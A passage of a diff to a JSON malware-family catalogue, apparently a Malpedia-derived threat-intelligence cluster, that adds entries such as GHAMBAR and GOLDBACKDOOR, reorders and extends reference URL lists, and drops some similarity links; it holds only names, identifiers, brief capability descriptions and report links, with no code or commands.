"type": []
@@ -24343,14 +25803,27 @@
"uuid": "9c89baf1-9639-4990-b218-14680170944f",
"value": "Gh0stTimes"
},
+ {
+ "description": "According to Mandiant, GHAMBAR is a remote administration tool (RAT) that communicates with its C2 server using SOAP requests over HTTP. Its capabilities include filesystem manipulation, file upload and download, shell command execution, keylogging, screen capture, clipboard monitoring, and additional plugin execution.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghambar",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4b9216e7-3a64-4b2e-97fd-54697d87cb72",
+ "value": "GHAMBAR"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole",
+ "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf",
"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
- "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/",
- "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf"
+ "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/"
],
"synonyms": [
"CoreImpact (Modified)",
@@ -24358,15 +25831,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "43a0d8a7-558d-4104-8a24-55e6e7a503db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd",
"value": "Ghole"
},
@@ -24375,9 +25839,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor",
- "https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit",
+ "https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical-details_PDF_eng.pdf",
- "https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/"
+ "https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit"
],
"synonyms": [],
"type": []
@@ -24390,10 +25854,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet",
- "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
"https://www.nartv.org/2019/03/28/10-years-since-ghostnet/",
- "https://en.wikipedia.org/wiki/GhostNet"
+ "https://en.wikipedia.org/wiki/GhostNet",
+ "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html"
],
"synonyms": [
"Remosh"
@@ -24408,23 +25872,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html",
- "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/"
+ "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html"
],
"synonyms": [
"Ghost iBot"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a68f1b43-c742-4f90-974d-2e74ec703e44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6201c337-1599-4ced-be9e-651a624c20be",
"value": "GhostAdmin"
},
@@ -24433,68 +25888,71 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
- "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
- "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf",
- "https://risky.biz/whatiswinnti/",
+ "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf",
+ "https://attack.mitre.org/groups/G0096",
+ "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf",
+ "https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://s.tencent.com/research/report/836.html",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://attack.mitre.org/groups/G0026",
- "https://www.secureworks.com/research/threat-profiles/bronze-edison",
- "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new",
- "https://www.intezer.com/blog/malware-analysis/chinaz-relations/",
+ "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html",
+ "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html",
"https://asec.ahnlab.com/en/32572/",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
- "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits",
+ "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2",
+ "https://risky.biz/whatiswinnti/",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
"https://blog.cylance.com/the-ghost-dragon",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
"https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
- "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/",
- "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "http://www.nartv.org/mirror/ghostnet.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://attack.mitre.org/groups/G0011",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/",
- "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
- "https://www.intezer.com/blog-chinaz-relations/",
- "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/",
- "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html",
- "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/",
- "http://www.malware-traffic-analysis.net/2018/01/04/index.html",
- "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2",
- "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
- "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
- "https://www.secureworks.com/research/threat-profiles/bronze-globe",
- "https://blog.talosintelligence.com/2019/09/panda-evolution.html",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-fleetwood",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/",
- "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
- "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf",
- "https://attack.mitre.org/groups/G0001/",
- "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html",
- "http://www.nartv.org/mirror/ghostnet.pdf",
- "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html",
- "http://www.hexblog.com/?p=1248",
- "https://attack.mitre.org/groups/G0096",
+ "https://blog.talosintelligence.com/2019/09/panda-evolution.html",
+ "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
"https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/",
- "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf",
- "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
- "https://www.prevailion.com/the-gh0st-remains-the-same-2/"
+ "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf",
+ "https://attack.mitre.org/groups/G0026",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits",
+ "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new",
+ "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
+ "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-edison",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://www.prevailion.com/the-gh0st-remains-the-same-2/",
+ "http://www.hexblog.com/?p=1248",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
+ "https://www.intezer.com/blog/malware-analysis/chinaz-relations/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-globe",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf",
+ "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
+ "https://www.intezer.com/blog-chinaz-relations/",
+ "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/",
+ "https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf",
+ "http://www.malware-traffic-analysis.net/2018/01/04/index.html",
+ "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://s.tencent.com/research/report/836.html",
+ "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf",
+ "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41"
],
"synonyms": [
"Farfli",
@@ -24506,6 +25964,19 @@
"uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738",
"value": "Ghost RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0b317327-6783-441f-8634-388599cbbff6",
+ "value": "GhostSecret"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -24550,8 +26021,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ginzo",
- "https://twitter.com/struppigel/status/1506933328599044100",
"https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://blog.talosintelligence.com/haskers-gang-zingostealer/",
+ "https://twitter.com/struppigel/status/1506933328599044100",
"https://www.govcert.ch/downloads/whitepapers/Unflattening-ConfuserEx-Code-in-IDA.pdf"
],
"synonyms": [],
@@ -24605,25 +26077,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter",
- "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run",
- "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/",
- "https://isc.sans.edu/diary/23417",
"https://blog.ensilo.com/globeimposter-ransomware-technical",
+ "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant",
"https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
- "https://asec.ahnlab.com/ko/30284/"
+ "https://asec.ahnlab.com/en/48940/",
+ "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run",
+ "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/",
+ "https://asec.ahnlab.com/ko/30284/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/",
+ "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf",
+ "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://isc.sans.edu/diary/23417"
],
"synonyms": [
"Fake Globe"
@@ -24655,46 +26129,38 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a379f09b-5cec-4bdb-9735-125cef2de073",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370",
"value": "GlooxMail"
},
{
- "description": "",
+ "description": "Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba",
- "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
- "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
- "https://community.riskiq.com/article/2a36a7d2/description",
- "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728",
- "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
- "https://blog.google/technology/safety-security/new-action-combat-cyber-crime/",
- "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/",
- "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/",
- "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/",
- "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
- "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf",
- "http://resources.infosecinstitute.com/tdss4-part-1/",
+ "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
"https://habr.com/ru/company/solarsecurity/blog/578900/",
- "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html",
- "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/",
+ "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf",
"https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/",
- "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
+ "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728",
+ "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
+ "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
+ "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
+ "https://community.riskiq.com/article/2a36a7d2/description",
+ "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
+ "https://blog.google/technology/safety-security/new-action-combat-cyber-crime/",
+ "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/",
"https://labs.k7computing.com/?p=22319",
+ "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/",
+ "http://resources.infosecinstitute.com/tdss4-part-1/",
"https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter",
+ "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
+ "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
"https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf"
],
"synonyms": [],
@@ -24722,8 +26188,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker",
"https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html",
- "https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go",
- "https://twitter.com/GrujaRS/status/1254657823478353920"
+ "https://twitter.com/GrujaRS/status/1254657823478353920",
+ "https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go"
],
"synonyms": [],
"type": []
@@ -24736,9 +26202,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
- "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/"
+ "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/"
],
"synonyms": [
"GOSLU"
@@ -24800,15 +26266,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4bc55eb3-7c92-4668-a75a-d5e291387613",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2",
"value": "Goggles"
},
@@ -24827,13 +26284,26 @@
"uuid": "034a3db0-b53c-4ec1-9390-4b6f214e1233",
"value": "GoGoogle"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldbackdoor",
+ "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "54f5cf02-6fdc-43b4-af06-87af1a901264",
+ "value": "GOLDBACKDOOR"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye",
- "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/",
- "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/"
+ "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/"
],
"synonyms": [
"Petya/Mischa"
@@ -24848,8 +26318,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper",
- "https://tomiwa-xy.medium.com/static-analysis-of-goldenhelper-malware-golden-tax-malware-d9f85a88e74d",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/",
+ "https://tomiwa-xy.medium.com/static-analysis-of-goldenhelper-malware-golden-tax-malware-d9f85a88e74d"
],
"synonyms": [],
"type": []
@@ -24862,15 +26332,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.ic3.gov/Media/News/2020/201103-1.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/",
+ "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/",
- "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/",
"https://www.ic3.gov/media/news/2020/200728.pdf",
- "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/",
+ "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/",
+ "https://www.ic3.gov/Media/News/2020/201103-1.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/"
],
"synonyms": [],
"type": []
@@ -24883,30 +26353,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://securelist.com/extracting-type-information-from-go-binaries/104715/",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/",
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
- "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://securelist.com/extracting-type-information-from-go-binaries/104715/",
+ "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/",
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/"
],
"synonyms": [
"SUNSHUTTLE"
],
"type": []
},
- "related": [
- {
